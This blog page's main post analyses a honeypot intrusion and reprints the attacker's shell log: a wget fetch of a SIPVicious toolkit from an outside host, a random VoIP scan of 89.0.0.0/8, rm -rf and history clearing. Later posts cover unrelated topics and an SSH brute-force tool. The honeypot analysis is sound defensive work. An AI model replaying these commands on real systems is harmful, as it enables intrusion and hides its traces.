sip/pptable.py
sip/parole
sip/helper.pyc
sip/helper.py
sip/HELP
sip/groupdb
sip/go
sip/fphelper.pyc
sip/fphelper.py
sip/Changelog
sip/.svn
sip/.svn/tmp
sip/.svn/tmp/text-base
sip/.svn/tmp/props
sip/.svn/tmp/prop-base
sip/.svn/text-base
sip/.svn/text-base/totag.svn-base
sip/.svn/text-base/TODO.svn-base
sip/.svn/text-base/THANKS.svn-base
sip/.svn/text-base/svwar.py.svn-base
sip/.svn/text-base/svreport.py.svn-base
sip/.svn/text-base/svmap.py.svn-base
sip/.svn/text-base/svlearnfp.py.svn-base
sip/.svn/text-base/svcrack.py.svn-base
sip/.svn/text-base/sv.xsl.svn-base
sip/.svn/text-base/staticheaders.svn-base
sip/.svn/text-base/staticfull.svn-base
sip/.svn/text-base/regen.py.svn-base
sip/.svn/text-base/README.svn-base
sip/.svn/text-base/pptable.py.svn-base
sip/.svn/text-base/helper.py.svn-base
sip/.svn/text-base/groupdb.svn-base
sip/.svn/text-base/fphelper.py.svn-base
sip/.svn/text-base/Changelog.svn-base
sip/.svn/props
sip/.svn/prop-base
sip/.svn/prop-base/totag.svn-base
sip/.svn/prop-base/svwar.py.svn-base
sip/.svn/prop-base/svreport.py.svn-base
sip/.svn/prop-base/svmap.py.svn-base
sip/.svn/prop-base/svlearnfp.py.svn-base
sip/.svn/prop-base/svcrack.py.svn-base
sip/.svn/prop-base/staticheaders.svn-base
sip/.svn/prop-base/staticfull.svn-base
sip/.svn/prop-base/groupdb.svn-base
sip/.svn/format
sip/.svn/entries
sip/.svn/all-wcprops
sales:/var/tmp/...# cd sip
sales:/var/tmp/.../sip# chmod 777 *
sales:/var/tmp/.../sip# chmod +x *
sales:/var/tmp/.../sip# ./svmap.py --randomize 89.0.0.0/8
___
{o,o}
|)__)
-"-"-
O RLY? yes
___
{o,o}
(__(|
-"-"-
NO WAI!
sales:/var/tmp/.../sip# cd ..
sales:/var/tmp/...# ls
sip.tgz sip
sales:/var/tmp/...# rm -rf *
sales:/var/tmp/...# w
sales:/var/tmp/...#
sales:/var/tmp/...#
sales:/var/tmp/...# history -c4
1 w
2 uname -a
3 cat /etc/issue
4 cat /proc/cpuinfo
5 cd /var/tmp/
6 ls
7 yum -y install gcc sendmail screen
8 apt-get install gcc sendmail screen
9 mkdir "..."
10 cd "..."
11 wget http://wed2010.ucoz.com/sip.tgz
12 tar zxvf s
13 locate sip.conf
14 apt-get install locate
15 locate sip.conf
16 ls
17 tar zxvf sip.tgz
18 cd sip
19 chmod 777 *
20 chmod +x *
21 ./svmap.py --randomize 89.0.0.0/8
22 cd ..
23 ls
24 rm -rf *
25 history -c4
sales:/var/tmp/...# history -c

The first thing the attacker does after getting oriented is to download screen and sendmail. Screen is a window session management tool. It's used to multiplex a terminal between several processes. If you get disconnected from the remote session, your session isn't lost. Sendmail is installed because very likely they wish to set up an open mail relay and/or communicate via email. Having your programs send their results via email is easy to script.

The attacker than goes to http://wed2010.ucoz.com and downloads sip.tgz using wget and unpacks it. He tries to check the sip.conf file which does not exist and then starts a sipvicious python scanning script called svmap.py. What is odd is that the attacker is randomly scanning the address space that he is coming from, i.e. ./svmap.py --randomize 89.0.0.0/8 is in the same network space as 89.42.192.73. This would tend to suggest that the attacker is either making an internal attack on his ISP look like an external attack from the U.S., or the attacker has compromised a Romanian system and wants to expand his range on the network without compromising his toehold. A third possibility is that it's a functionality test. The attacker has scanned that network, has a list of VOIP systems, and wants to check his VOIP scanner against that list to make sure it works and is not being filtered.

Team Cymru has a post from September 3rd, about the new phreaks using sipvicious to find and attack VOIP PBX systems. Unfortunately, since my router hosed and the connection was lost, it is likely that the attacker didn't finish configuring sipvicious or sendmail and could not reconnect to finish the session. The toolkit I have appears to have the following timestamp:

Sep 3 16:41 .svn

which coincides with a spike in port 5060 traffic for September 3, 2010 according to the SANS ISC 5060 Port Report.

September 2010 port 5060 traffic






















It may just be a coincidence and signify that the attackers are using a fairly recent development version of sipvicious since I can't find any custom modifications to the code.

Labels: ,


Tuesday, October 05, 2010

Dominant Classes Derive From Surviving Mass Extinction Events

A new discovery of dinosaur footprints 2 million years after the Permian extinction event suggests that dinosaurs rose to ascendancy because they were the majority of survivors. In other words, the Permian mass extinction led directly to the success of the dinosaurs until they were wiped out in another mass extinction 160 million or more years later. As pointed out in the article, the later mass extinction at the end of the Cretaceous allowed mammals to evolve and spread throughout the planet. As we enter this third planetary mass extinction event, will humans just be the cause of the extinction of 95% of life on the planet, including ourselves? Are we setting the stage for something else to replace us just like we replaced the dinosaurs? The difference this time will be that a species caused the mass extinction rather than some external environmental event like volcanoes or asteroid impacts.

Labels:


Gonzalo Lira Interview on The Keiser Report

Gonzalo Lira was interviewed on The Keiser Report. The full interview is below.

video

The entire show is here.

Labels:


Sunday, October 03, 2010

The State of IT Security

The state of IT Security is rather dismal. Attacks on vulnerable services that worked 10 years ago still work today despite the fact that operating systems have been hardened, and firewalls and intrusion detection and prevention systems (IDS/IPS) are in place. What really makes me mad though is the lack of available information. I purchased a book called Network Security Assessment. While it's a useful reference to have, it is obsolete and incomplete in sections. How do I know this? I have been running honeypots. I discovered that the malicious elements are using a tool called UnixCod to brute force SSH connections. I have only found one review of this "password auditing tool". To say that it is a password auditing tool is being generous. UnixCod is a fast network scanner that finds systems running the SSH service and tries to exploit them with a brute force dictionary attack of common usernames and passwords that has been around since 2005. You'd think a book written in 2008 would mention such a tool, but it doesn't. In fact, this tool can scan 64,516 hosts in 9 minutes flat and then attack the ones only running SSH. Maybe this is a slow tool by state of the art standards, but I was impressed. This highlights a growing problem with IT Security in general, the lack of distributive knowledge bases. The people who are supposed to protect the networks are months, if not years behind, in knowing what the people attacking them are up to. There is not enough knowledge sharing within the community, and it only hurts the defenders. To add insult to injury, why does my ISP allow brute force ssh and VOIP attacks on my systems from overseas? Obviously my ISP doesn't care if I get hacked and lose money, but my bank might. It would be rather trivial to drop packets from overseas IP addresses that are being malicious and running such tools to protect one's customers, that is what IDS/IPS systems are designed to do, I guess that the major ISPs just don't care with the exception of Comcast.

Labels:


This page is powered by Blogger. Isn't yours?